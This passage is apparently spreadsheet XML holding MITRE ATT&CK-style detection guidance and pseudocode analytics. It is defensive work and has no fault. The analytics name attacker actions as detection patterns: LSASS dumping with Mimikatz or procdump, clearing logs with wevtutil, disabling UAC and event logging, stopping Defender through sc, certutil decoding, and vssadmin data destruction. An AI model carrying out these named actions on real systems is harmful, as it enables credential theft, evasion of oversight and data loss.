    <t>Monitor for API calls that may attempt to gather information about attached peripheral devices and components connected to a computer system.</t>
  </si>
  <si>
    <t>relationship--2eb71541-0483-4761-a839-17e19f75aab1</t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddMonitor&lt;/code&gt;.(Citation: AddMonitor)</t>
  </si>
  <si>
    <t>relationship--aa84727a-49eb-46cd-ac18-4fb7bd58fa98</t>
  </si>
  <si>
    <t>attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662</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</si>
  <si>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</si>
  <si>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relationship--a840fb6f-9a16-496b-b148-bc6fe40b8160</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</si>
  <si>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</si>
  <si>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relationship--a6424b64-2e69-4afc-a239-f9fcbff62862</t>
  </si>
  <si>
    <t>Monitor process API calls to &lt;code&gt;AddPrintProcessor&lt;/code&gt; and &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--d2f6b3a1-adcb-4afb-9807-8ae58e6ac340</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for API calls may attempt to get information about running processes on a system. </t>
  </si>
  <si>
    <t>relationship--329e0df7-2d7b-44d6-8dc0-5074df2627b8</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</si>
  <si>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</si>
  <si>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relationship--c46973bd-8af5-4763-8f01-0335d8709668</t>
  </si>
  <si>
    <t>attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4</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</si>
  <si>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</si>
  <si>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relationship--b21e44db-dc9f-4abe-82fa-97600ba47abc</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</si>
  <si>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</si>
  <si>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relationship--a721a012-3006-476c-88a7-19bfc52bbce4</t>
  </si>
  <si>
    <t>attack-pattern--ea016b56-ae0e-47fe-967a-cc0ad51af67f</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</si>
  <si>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</si>
  <si>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relationship--0176d885-2f36-4b9a-b325-ff25a37c2341</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</si>
  <si>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
&lt;h4&gt; Analytic 1 - Suspicious API Calls&lt;/h4&gt;
&lt;code&gt;suspicious_apis = filter api_calls where
  ApiName LIKE '%RegOpenKeyEx%' OR
  ApiName LIKE '%RegOpenUserClassesRoot%'&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--6f050b2e-7596-4fdf-b7b1-1234969c4de9</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</si>
  <si>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</si>
  <si>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relationship--c25bdab1-7304-41f8-99f7-299c7f2fdcbd</t>
  </si>
  <si>
    <t>relationship--7bd8ad9d-329f-469e-aa9c-1951cbc63a26</t>
  </si>
  <si>
    <t>Monitor for API calls, such as PowerShell's Get-ADUser cmdlet or Windows API DsAddSidHistory function,  to examine data in user’s SID-History attributes, especially users who have SID-History values from the same domain.</t>
  </si>
  <si>
    <t>relationship--3fd2bd7d-0d30-42b7-a9e7-83b7300ca143</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</si>
  <si>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</si>
  <si>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relationship--d7fde99c-0e71-4150-b2f8-94fce59dade9</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</si>
  <si>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</si>
  <si>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relationship--df408868-c30e-4bf0-b42c-b115955b1595</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</si>
  <si>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</si>
  <si>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relationship--34fbf884-95f1-480c-b032-0011f62f00f0</t>
  </si>
  <si>
    <t>Monitor for API calls that may execute malicious payloads via loading shared modules.</t>
  </si>
  <si>
    <t>relationship--9b99ec5e-b08c-44e1-b942-d752964ef12b</t>
  </si>
  <si>
    <t>Monitor for API calls that may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment.</t>
  </si>
  <si>
    <t>relationship--697bd63e-b442-4dc9-8714-6c4b7515369f</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for API calls that bypass process and/or signature based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. </t>
  </si>
  <si>
    <t>relationship--8492acd6-397b-4c6f-9d6d-9998f56363ff</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</si>
  <si>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</si>
  <si>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relationship--f81a2588-e40f-4d55-80f0-4bc40c67906a</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</si>
  <si>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</si>
  <si>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relationship--1dd2f471-eeba-4deb-b0ad-d334ebfab627</t>
  </si>
  <si>
    <t>Monitor for API calls that may attempt to gather information about the system language of a victim in order to infer the geographical location of that host.</t>
  </si>
  <si>
    <t>relationship--afced7ba-9fc7-42a5-8e7d-caed78c2d54d</t>
  </si>
  <si>
    <t>Remote access tools with built-in features may interact directly with the Windows API, such as calling &lt;code&gt; GetLocaleInfoW&lt;/code&gt; to gather information.(Citation: FBI Ragnar Locker 2020)</t>
  </si>
  <si>
    <t>relationship--73e382dc-5808-42b6-b796-e4ca35a198f4</t>
  </si>
  <si>
    <t>Monitor for API calls (such as &lt;code&gt;GetAdaptersInfo()&lt;/code&gt; and &lt;code&gt;GetIpNetTable()&lt;/code&gt;) that may gather details about the network configuration and settings, such as IP and/or MAC addresses.</t>
  </si>
  <si>
    <t>relationship--d38fdcaf-2243-460e-9afc-c7a616f45d9e</t>
  </si>
  <si>
    <t>Monitor for API calls that may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.</t>
  </si>
  <si>
    <t>relationship--9206eef2-3336-4c6d-808c-e809bed9784e</t>
  </si>
  <si>
    <t>relationship--1b9546ba-1147-47f9-84ec-443e20351646</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</si>
  <si>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</si>
  <si>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relationship--ab1a63f7-388d-4255-b66f-39768828cd70</t>
  </si>
  <si>
    <t>Monitor for API calls that may gather the system time and/or time zone from a local or remote system. Remote access tools with built-in features may interact directly with the Windows API to gather information.</t>
  </si>
  <si>
    <t>relationship--a4768f99-0f62-431f-b5df-f8bb4146a0fd</t>
  </si>
  <si>
    <t>attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6</t>
  </si>
  <si>
    <t>relationship--32c6dd7a-b03b-4f44-8215-52e9844b82a1</t>
  </si>
  <si>
    <t>attack-pattern--e49ee9d2-0d98-44ef-85e5-5d3100065744</t>
  </si>
  <si>
    <t>relationship--dfaba796-8057-46ce-aa83-213bef99ba2f</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</si>
  <si>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</si>
  <si>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relationship--1d523cb7-5725-40d8-9a21-ef119c6fa43f</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for API calls associated with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators, such as DuplicateToken(Ex), ImpersonateLoggedOnUser , and SetThreadToken. </t>
  </si>
  <si>
    <t>relationship--9582015e-a920-4e26-9350-c61872f4637b</t>
  </si>
  <si>
    <t>relationship--1d0b86d9-1658-4b92-b56b-79908f3810f5</t>
  </si>
  <si>
    <t>relationship--6ad24bad-dc5d-47fa-ac2b-38a58e7775fd</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</si>
  <si>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</si>
  <si>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relationship--0644c9b1-f02c-4230-9359-0fc54cae5945</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</si>
  <si>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</si>
  <si>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relationship--2a63bcf8-fff3-4b31-8164-f8ee290425ba</t>
  </si>
  <si>
    <t>relationship--ae52f324-cdfa-4fc9-b7a4-0957b782b813</t>
  </si>
  <si>
    <t>Monitor for API calls (such as those from `wlanAPI.dll`) that may gather details about locally reachable Wi-Fi networks.</t>
  </si>
  <si>
    <t>relationship--146d6cb5-c6a6-4255-af7b-8c671c1b6fd0</t>
  </si>
  <si>
    <t>Consider monitoring API calls such as &lt;code&gt;CredEnumerateA&lt;/code&gt; that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)</t>
  </si>
  <si>
    <t>relationship--b70f1daf-612e-4e6c-b894-310eb436b39f</t>
  </si>
  <si>
    <t>Monitor for API calls that may create or modify Windows services (ex: ` CreateServiceW()`) to repeatedly execute malicious payloads as part of persistence.</t>
  </si>
  <si>
    <t>relationship--ed1c4fff-998f-499d-8a00-cfdee554254c</t>
  </si>
  <si>
    <t>Passive DNS</t>
  </si>
  <si>
    <t>x-mitre-data-component--cc150ad8-ecfa-4340-9aaa-d21165873bd4</t>
  </si>
  <si>
    <t>Monitor for logged domain name system (DNS) data that may buy, lease, or rent infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>relationship--afa802aa-9b4d-47a8-8bd1-04f026b7cec8</t>
  </si>
  <si>
    <t>Monitor for logged domain name system (DNS) data that may compromise third-party infrastructure that can be used during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.</t>
  </si>
  <si>
    <t>relationship--b262ab77-a591-41eb-b8dc-f0af1d31b920</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</si>
  <si>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</si>
  <si>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relationship--cd10cc85-ccc4-4683-9421-9254a0d1259a</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</si>
  <si>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</si>
  <si>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relationship--252407c3-6cc6-4e80-b7ac-73b2e63887b8</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</si>
  <si>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</si>
  <si>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relationship--287bfc5a-6e17-4d3c-980b-1577338416ab</t>
  </si>
  <si>
    <t>Pod Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--5263cb33-08cc-4a68-820f-004e1e400d76</t>
  </si>
  <si>
    <t>Monitor for newly constructed pods that may deploy a container into an environment to facilitate execution or evade defenses.</t>
  </si>
  <si>
    <t>relationship--96741d5a-c680-44d8-a895-a6437dcb1083</t>
  </si>
  <si>
    <t>Pod Enumeration</t>
  </si>
  <si>
    <t>x-mitre-data-component--07688e40-a7fa-4436-937f-1216674341a0</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</si>
  <si>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</si>
  <si>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relationship--43d71a3e-1a46-4b5d-b887-cb373d143c9a</t>
  </si>
  <si>
    <t>Pod Modification</t>
  </si>
  <si>
    <t>x-mitre-data-component--672b2ebd-4310-4efe-bf03-7ab005298a74</t>
  </si>
  <si>
    <t>Monitor for changes made to pods for unexpected modifications to settings and/or control data that may deploy a container into an environment to facilitate execution or evade defenses.</t>
  </si>
  <si>
    <t>relationship--d70231db-83cd-4ffe-895d-9614200bf0ae</t>
  </si>
  <si>
    <t>Process Access</t>
  </si>
  <si>
    <t>x-mitre-data-component--1887a270-576a-4049-84de-ef746b2572d6</t>
  </si>
  <si>
    <t>Monitor for processes being viewed that may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>relationship--5fdc377d-9d14-4b2c-a039-e8123c119b85</t>
  </si>
  <si>
    <t>This may be a difficult technique to detect because adversary traffic may be masked by normal user traffic. Monitor for [Process Injection](https://attack.mitre.org/techniques/T1055) against browser applications.</t>
  </si>
  <si>
    <t>relationship--81d08c26-f2bf-463b-9db9-4f1f9dc5205b</t>
  </si>
  <si>
    <t>Monitor for processes being accessed that may search for common password storage locations to obtain user credentials.</t>
  </si>
  <si>
    <t>relationship--b7819241-5f33-482f-b43f-fed5e3e62cbc</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</si>
  <si>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</si>
  <si>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relationship--1ec3991a-6aa1-422a-a0de-560ca7d143a3</t>
  </si>
  <si>
    <t>Monitor for unexpected processes interacting with the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.</t>
  </si>
  <si>
    <t>relationship--8fcb7ffa-1ebe-4e11-bd2d-631d61066361</t>
  </si>
  <si>
    <t>Monitor for process being viewed that may inject dynamic-link libraries (DLLs) into processes in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>relationship--7592143e-1c3e-43e2-bde2-b6f65292af3e</t>
  </si>
  <si>
    <t>Monitor for processes making abnormal calls to higher privileged processes, such as a user application connecting to a VPN service.(Citation: versprite xpc vpn)</t>
  </si>
  <si>
    <t>relationship--c88798bd-2ddb-4fd8-b5b8-1a150cb87032</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</si>
  <si>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&lt;h4&gt; Analytic 1 -  Mimikatz&lt;/h4&gt;
&lt;code&gt; processes = filter processes where (event_id == "10" AND target_process == "*lsass.exe" AND granted_access == "0x1410") &lt;/code&gt;
&lt;h4&gt; Analytic 2 - Procdump &lt;/h4&gt;
&lt;code&gt; processes = filter processes where (event_id == "10" AND target_process == "*lsass.exe" AND source_process == "*procdump.exe") &lt;/code&gt;
&lt;h4&gt;Analytic 3 - Windows Task Manager&lt;/h4&gt;
&lt;code&gt; processes = filter processes where (event_id == "10" AND target_process == "*lsass.exe" AND source_process == "c:\windows\*\taskmgr.exe") &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--15f594bd-b2c1-41c1-82fa-b3c72f82993d</t>
  </si>
  <si>
    <t>Monitor for unexpected processes interacting with authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts.</t>
  </si>
  <si>
    <t>relationship--1574a1bc-6b70-4179-b2e5-6f4233e7f5ff</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</si>
  <si>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</si>
  <si>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relationship--de200120-25ab-4d9e-a6c3-cbce0d92d25a</t>
  </si>
  <si>
    <t>Monitor process being accessed that may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019)</t>
  </si>
  <si>
    <t>relationship--340d8351-0454-4224-9fbd-da1c9f7483a1</t>
  </si>
  <si>
    <t>Monitor for processes being viewed that may inject portable executables (PE) into processes in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>relationship--37e99b1d-cd16-43e2-9b5e-595180795671</t>
  </si>
  <si>
    <t>Monitor for processes being viewed that may inject malicious code into suspended and hollowed processes in order to evade process-based defenses.</t>
  </si>
  <si>
    <t>relationship--f1b9730f-6c73-4686-afe6-34d9a89f98af</t>
  </si>
  <si>
    <t>Monitor for processes being viewed that may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>relationship--59a61b7e-eb12-4846-89b0-9de5d0dccde6</t>
  </si>
  <si>
    <t>Monitor for processes being viewed that may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>relationship--44c7a649-7715-45a7-8f1a-d6946e7c9295</t>
  </si>
  <si>
    <t>Monitor for processes being accessed that may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain.</t>
  </si>
  <si>
    <t>relationship--da0c5180-2999-413a-ae7b-142495c86553</t>
  </si>
  <si>
    <t>Monitor for attempts by programs to inject into or dump browser process memory.</t>
  </si>
  <si>
    <t>relationship--2303e878-ce48-459d-a5da-256142e2bfd8</t>
  </si>
  <si>
    <t>relationship--f18c2611-d0ca-457d-a92a-55b43561faaf</t>
  </si>
  <si>
    <t>Monitor for processes being viewed that may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>relationship--f5f3a9b4-194a-4779-8fdd-2dd6f01559c9</t>
  </si>
  <si>
    <t>Monitor for processes being viewed that may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges.</t>
  </si>
  <si>
    <t>relationship--be6403a2-a85d-4124-a506-48ba79909404</t>
  </si>
  <si>
    <t>attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19</t>
  </si>
  <si>
    <t>relationship--6693651e-b3bf-4a95-802f-f3f2f4fc810c</t>
  </si>
  <si>
    <t>Process Creation</t>
  </si>
  <si>
    <t>x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077</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</si>
  <si>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&lt;h4&gt; Analytic 1 : Get System Elevation &lt;/h4&gt;
&lt;code&gt; suspicious_processes = filter processes where (
  (parent_image_path == C:\Windows\System32\services.exe" AND
   image_path == "C:\Windows\System32\cmd.exe" AND
   command_line == "*echo*" AND
   command_line == "*\pipe\*") OR
  (image_path == "C:\Windows\System32\rundll32.exe" AND
   command_line == "*,a /p:*")) &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--1cfc250f-8944-4310-ad21-1129c32f308a</t>
  </si>
  <si>
    <t>Monitor for executed processes that may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls.</t>
  </si>
  <si>
    <t>relationship--eef80a68-dd2a-453b-b115-88a4d97730b6</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</si>
  <si>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&lt;h4&gt; Analytic 1 : Command Launched from Winlogon &lt;/h4&gt;
&lt;code&gt; processes = filter process where ((event_id == "1" OR event_id="4688") AND (parent_exe == "winlogon.exe" and exe == "cmd.exe") AND command_line="*(sethc.exe OR utilman.exe OR osk.exe OR narrator.exe OR magnify.exe)*"&lt;/code&gt;
&lt;h4&gt; Analytic 2 : Debuggers for Accessibility Applications &lt;/h4&gt;
&lt;code&gt; debuggers = filter process where (command_line match "$.* .*(sethcutilmanosknarratormagnify)\.exe")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--4f87daea-245e-484f-84bc-e0f6656a0dcb</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</si>
  <si>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</si>
  <si>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relationship--a18e4022-0cfd-4ee0-b851-bec3b426315a</t>
  </si>
  <si>
    <t>Monitor for newly constructed processes indicative of modifying account settings, such as those that modify `authorized_keys` or `/etc/ssh/sshd_config` files.</t>
  </si>
  <si>
    <t>relationship--45cf2f0f-0398-4fb2-9d82-5ade58f33e30</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may achieve persistence by adding a Registry key to the Active Setup of the local machine.</t>
  </si>
  <si>
    <t>relationship--36971cb7-b06e-48d6-9591-15a00b3a5161</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor newly executed processes that may abuse Microsoft Office add-ins to obtain persistence on a compromised system. </t>
  </si>
  <si>
    <t>relationship--d4bb82ea-dce3-4f6f-973c-32e1e6b0112c</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes.</t>
  </si>
  <si>
    <t>relationship--a854160c-308d-4221-92b4-1ab5ce2b7291</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</si>
  <si>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</si>
  <si>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relationship--01786141-4ea8-47f2-bc32-af9d48ce5bb2</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</si>
  <si>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</si>
  <si>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relationship--9eeb0de3-2010-4f77-949d-501299902a63</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</si>
  <si>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</si>
  <si>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relationship--60b233c6-0ee4-4312-8edf-eda18ab9b879</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</si>
  <si>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&lt;h4&gt; Analytic 1 - Suspicious Processes&lt;/h4&gt;
&lt;code&gt; suspicious_processes = filter process where 
  (event_id == "1" OR event_id == "4688") AND
  (command_line LIKE '%Get-Process%' AND command_line LIKE '%mainWindowTitle%')&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--3eb31ed1-d93b-4897-bd66-bf2a2935ff71</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly constructed processes and/or command-lines that aid in compression or encrypting data that is collected prior to exfiltration, such as 7-Zip, WinRAR, and WinZip.  </t>
  </si>
  <si>
    <t>relationship--e342f3ae-10f0-4740-937b-5cead8204d78</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Command Line Usage of Archiving Software&lt;/h4&gt;
&lt;code&gt; rar_argument = filter processes where (command_line == "* a *")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--4dab06d8-9be7-4c61-b16a-82b0c2607d70</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</si>
  <si>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&lt;h4&gt;Analytic &lt;/h4&gt;
&lt;code&gt;at = filter process where (exe == "at.exe")&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--5750c3fc-54dc-41e0-b661-c548deee0b9a</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</si>
  <si>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&lt;h4&gt; Analytic 1 - BITS Job Persistence &lt;/h4&gt;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Analytic 2 : BITSAdmin Download File &lt;/h4&gt;
&lt;code&gt; bitsadmin_commands = filter processes where (
  exe ="C:\Windows\System32\bitsadmin.exe" AND command_line = *transfer*)
output bitsadmin_commands &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--e46dcc94-3608-4e31-9802-1c46368344f9</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</si>
  <si>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</si>
  <si>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relationship--bf12ba2e-9079-44f9-a116-d53b21715eeb</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Boot or Logon Initialization Scripts &lt;/h4&gt;
&lt;code&gt;logon_script_key_processes = filter processes where (
  command_line = "*reg*add*\Environment*UserInitMprLogonScript")
registry = search (Registry:Add OR Registry:Edit)
registry_logon_key_events = filter registry where (
  key = "*\Environment*UserInitMprLogonScript") &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--cb460459-aff8-49a7-8058-3089c2a2da23</t>
  </si>
  <si>
    <t>Monitor for the abnormal creation of background processes as well as processes executing from abnormal locations, such as `/dev/shm`.</t>
  </si>
  <si>
    <t>relationship--f3f6c1e3-2474-47ca-8dd8-477e037a51fc</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly executed processes that could be used to abuse internet browser extensions to establish persistence. </t>
  </si>
  <si>
    <t>relationship--c367a9f5-132b-40b3-8a00-ac71c6a8b65e</t>
  </si>
  <si>
    <t>Monitor for processes with arguments that may be associated with gathering browser information, such as local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)</t>
  </si>
  <si>
    <t>relationship--17290810-db79-4211-ac56-9fa021c8b3c8</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</si>
  <si>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Analytic 1 : UAC Bypass &lt;/h4&gt;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Analytic 2 : Disable UAC &lt;/h4&gt;
&lt;code&gt;cmd_processes = filter processes where (
                (parent_image = "C:\\Windows\\System32\\cmd.exe") AND (command_line = "reg.exe%HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System%REG_DWORD /d 0%")) &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--c8d2293d-14a2-4e56-ae43-8af584c1908e</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</si>
  <si>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&lt;h4&gt; Analytic 1 - CMSTP &lt;/h4&gt; 
&lt;code&gt; processes = filter processes where (
  (event_id == "1" OR event_id == "4688") AND 
  exe == "C:\Windows\System32\CMSTP.exe" AND
  src_ip NOT IN ["10.0.0.0/8", "192.168.0.0/16", "172.16.0.0/12"] ) &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--e020ddbe-0d2f-4697-a533-d1ee59971cc0</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</si>
  <si>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</si>
  <si>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relationship--283d89ff-a836-4c3e-a850-cfd055c32c03</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may establish persistence by executing malicious content triggered by a file type association.</t>
  </si>
  <si>
    <t>relationship--0d018c26-4bfa-452b-a355-e6b68c57b855</t>
  </si>
  <si>
    <t>Monitor for newly executed processes with arguments that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined emails.</t>
  </si>
  <si>
    <t>relationship--db003d7a-10da-4167-ba52-43a09e73075c</t>
  </si>
  <si>
    <t>Monitor created processes with arguments that may delete or alter malicious network configuration settings as well as generated artifacts that highlight network connection history on a host system -- which may include logs, files, or Registry values.</t>
  </si>
  <si>
    <t>relationship--17dd5cbe-e0c2-4743-8d96-a855978e9fda</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for newly executed processes that may delete or alter generated artifacts associated with persistence on a host system. </t>
  </si>
  <si>
    <t>relationship--7cadb166-106c-4664-91fe-2210758698e4</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Clearing Windows Logs with Wevtutil&lt;/h4&gt;
&lt;code&gt;cleared_logs = filter processes where (event_id = “1” AND process_name = “*wevtutil*” AND cmd_line= "*cl*" &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--ff207318-2a24-4f29-bc1a-552df8e671f7</t>
  </si>
  <si>
    <t>Monitor virtual machines for the creation of processes associated with cloud virtual machine agents. In Windows-based Azure machines, monitor for the WindowsAzureGuestAgent.exe process.(Citation: Mandiant Azure Run Command 2021)</t>
  </si>
  <si>
    <t>relationship--c1f38efc-1e8f-4cc5-a653-2bea38ed82c6</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may attempt to find cloud groups and permission settings.</t>
  </si>
  <si>
    <t>relationship--35fe75a6-11d0-4528-97ee-852aced5ed0a</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to modify the code signing policy of a system, such as &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt;. (Citation: Microsoft TESTSIGNING Feb 2021)</t>
  </si>
  <si>
    <t>relationship--794a94a5-53ee-46af-9510-527f651d2ace</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</si>
  <si>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</si>
  <si>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relationship--1f1fb0b2-4f02-4458-9b56-2c79ea7798f4</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</si>
  <si>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</si>
  <si>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relationship--77694ac6-12cf-4bea-a0c5-7c400702b70a</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Compiled HTML Access &lt;/h4&gt;
&lt;code&gt; processes = filter processes where (
(event_id == "1" OR event_id == "4688") AND 
exe="C:\Windows\syswow64\hh.exe" OR 
exe="C:\Windows\system32\hh.exe") &lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--62d69501-41a6-4c7a-8d54-760d0f0c5495</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that are associated with COM objects, especially those invoked by a user different than the one currently logged on.</t>
  </si>
  <si>
    <t>relationship--eed81627-aed7-477a-91e2-7be09c3d68e6</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.</t>
  </si>
  <si>
    <t>relationship--0a60c87c-4f32-43fa-8aec-dda732dd669b</t>
  </si>
  <si>
    <t>Container administration service activities and executed commands can be captured through logging of process execution with command-line arguments on the container as well as within the underlying host.</t>
  </si>
  <si>
    <t>relationship--8dacfb46-73ca-4cd0-91a1-11c6285e0fb5</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</si>
  <si>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</si>
  <si>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relationship--98e0e77b-b691-4c36-b2ab-98d5d94ee9cb</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</si>
  <si>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</si>
  <si>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relationship--ff7c818b-81a0-48b2-86ea-2f95e2c3ef55</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor newly executed processes associated with account creation, such as net.exe </t>
  </si>
  <si>
    <t>relationship--59795019-752e-437a-a49c-cdd789868694</t>
  </si>
  <si>
    <t>New, benign system processes may be created during installation of new software.</t>
  </si>
  <si>
    <t>relationship--27b8fac5-1d3d-43a6-b184-4c81243e1bb8</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</si>
  <si>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</si>
  <si>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relationship--b00793a5-09a4-4291-97cb-b3d908625085</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may search for common password storage locations to obtain user credentials.</t>
  </si>
  <si>
    <t>relationship--e183af2b-dab5-4877-b84e-e69e265bf7b1</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</si>
  <si>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</si>
  <si>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relationship--442a2cd1-62fa-4da2-9160-afbf88e6a8b9</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</si>
  <si>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</si>
  <si>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relationship--4abc64bb-16de-4cb5-b0dc-af5e90eef7dc</t>
  </si>
  <si>
    <t>Monitor newly constructed processes for unusual activity (e.g., a process that does not use the network begins to do so) as well as the introduction of new files/programs.</t>
  </si>
  <si>
    <t>relationship--d866e6c8-a75b-4b47-8994-271cdeaf6ed2</t>
  </si>
  <si>
    <t>Monitor for newly executed processes of binaries that could be involved in data destruction activity, such as SDelete.</t>
  </si>
  <si>
    <t>relationship--31343a3c-11be-4f53-ba3e-d3a65ce29165</t>
  </si>
  <si>
    <t>Monitor for newly constructed  processes and/or command-lines involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit.</t>
  </si>
  <si>
    <t>relationship--c553d54f-4dc1-482a-b6a9-bad21b92aafc</t>
  </si>
  <si>
    <t>Monitor for newly executed processes that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.</t>
  </si>
  <si>
    <t>relationship--e5339b65-75ce-433c-b83e-056f5156f28d</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</si>
  <si>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</si>
  <si>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relationship--0f9f6434-5732-49f1-a368-2d2cc9978ba2</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</si>
  <si>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&lt;h4&gt; Analytic 1 - CertUtil with Decode Argument &lt;/h4&gt;
&lt;code&gt; processes = filter processes where (
  (event_id == "1" OR event_id == "4688") AND
  exe =”C:\Windows\System32\certutil.exe” AND
  command_line = *decode* )&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--0cf04ae0-bc60-46e8-8cc7-9311e291dc20</t>
  </si>
  <si>
    <t>Monitor processes (`lsmod`, `driverquery.exe`, etc.) for events that may highlight potentially malicious attempts to enumerate device drivers.</t>
  </si>
  <si>
    <t>relationship--379832d1-d784-40ab-b9dc-78a73d0ae3a0</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may disable Windows event logging to limit data that can be leveraged for detections and audits.
&lt;h4&gt;Analytic 1 - Disable Windows Event Logging&lt;/h4&gt;
&lt;code&gt; susp_processes = filter processes where ((command_line CONTAINS("*New-Item*") OR command_line CONTAINS("*reg add*")) OR command_line CONTAINS("*MiniNt*")) OR (command_line CONTAINS("*Stop-Service*")AND command_line CONTAINS("*EventLog*")) OR (command_line CONTAINS("*EventLog*") AND (command_line CONTAINS("*Set-Service*") OR command_line CONTAINS("*reg add*") OR command_line CONTAINS("*Set-ItemProperty*") OR command_line CONTAINS("*New-ItemProperty*") OR command_line CONTAINS("*sc config*"))) OR (command_line CONTAINS("*auditpol*") AND (command_line CONTAINS("*/set*") OR command_line CONTAINS("*/clear*") OR command_line CONTAINS("*/revove*"))) OR ((command_line CONTAINS("*wevtutil*") AND (command_line CONTAINS("*sl*") OR command_line CONTAINS("*set-log*"))))&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--9ebbabdc-0468-43f0-a15d-c13c584dd180</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</si>
  <si>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&lt;h4&gt;Analytic 1 - Detecting Tampering of Windows Defender Command Prompt&lt;/h4&gt;
&lt;code&gt;target_processes = filter processes where ((exe="C:\\Windows\\System32\\sc.exe") AND (command_line="sc *config*" OR command_line="sc *stop*" OR command_line="sc *query*"))&lt;/code&gt;</t>
  </si>
  <si>
    <t>relationship--5b094d05-fb53-4bf6-9e97-4e44ce5f2514</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.</t>
  </si>
  <si>
    <t>relationship--f3d7d38c-a162-4437-949e-c0904c2dc792</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.</t>
  </si>
  <si>
    <t>relationship--cab80c28-2715-45d4-8d30-993b5050ead6</t>
  </si>
  <si>
    <t>Monitor newly executed processes that may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources.</t>
  </si>
  <si>
    <t>relationship--bdacae3a-b211-4f88-87f5-7607bbd94be7</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</si>
  <si>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</si>
  <si>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relationship--ec4e6513-e156-4ed6-b298-e740000f8f4a</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</si>
  <si>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</si>
  <si>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relationship--0f022198-8fdd-4b6e-8f44-d47ca6ee8d9b</t>
  </si>
  <si>
    <t>Monitor newly executed processes associated with account creation, such as net.exe</t>
  </si>
  <si>
    <t>relationship--41aa05fe-fb98-4bfd-856a-05fa71423c9c</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</si>
  <si>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&lt;h4&gt; Analytic 1 - Local Permission Group Discovery - Net &lt;/h4&gt;
